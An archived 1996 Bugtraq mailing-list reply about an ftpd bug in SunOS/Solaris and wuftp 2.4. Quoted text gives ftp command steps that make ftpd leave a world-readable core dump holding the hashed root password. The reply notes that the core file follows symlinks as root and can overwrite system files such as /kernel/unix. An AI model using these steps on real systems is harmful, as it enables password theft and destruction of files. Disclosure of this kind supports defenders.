'Re: BoS: Re: ftpd bug? Was: bin/1805: Bug in ftpd'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Re: BoS: Re: ftpd bug? Was: bin/1805: Bug in ftpd
From:       Erik Fichtner <emf () pls ! com>
Date:       1996-10-16 11:32:30
[Download RAW message or body]

Grant Kaufmann wrote:
>
> > Killing from the command line doesn't seem to work, but:
> > SunOS 5.5:
> >
> > logon via ftp with your regular user/password,
> > ftp> cd /tmp
> > ftp> user root wrongpasswd
> > ftp> quote pasv
> >
> > voila, root password in world readable core dump under /tmp
> Nope, its even better than that. Under 5.4, the core file
> is rw-rw-rw and it follows symlinks as root.

this applies to 5.5 as well.

This also applies to wuftp 2.4 on solaris 2.4

it does NOT apply to the dumping the hashed password to the
corefile.. but it will obliterate any file.  (can we say
/kernel/unix)

wuftp is slightly safer in that it dumps to they symlink
core as mode 664.

>
> --
> Grant
> --
> http://www.cs.uct.ac.za/~gkaufman/pgp.html

--
Erik Fichtner           Systems Administrator, PLS              emf@pls.com
                        'Your agonizer, please...'

[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic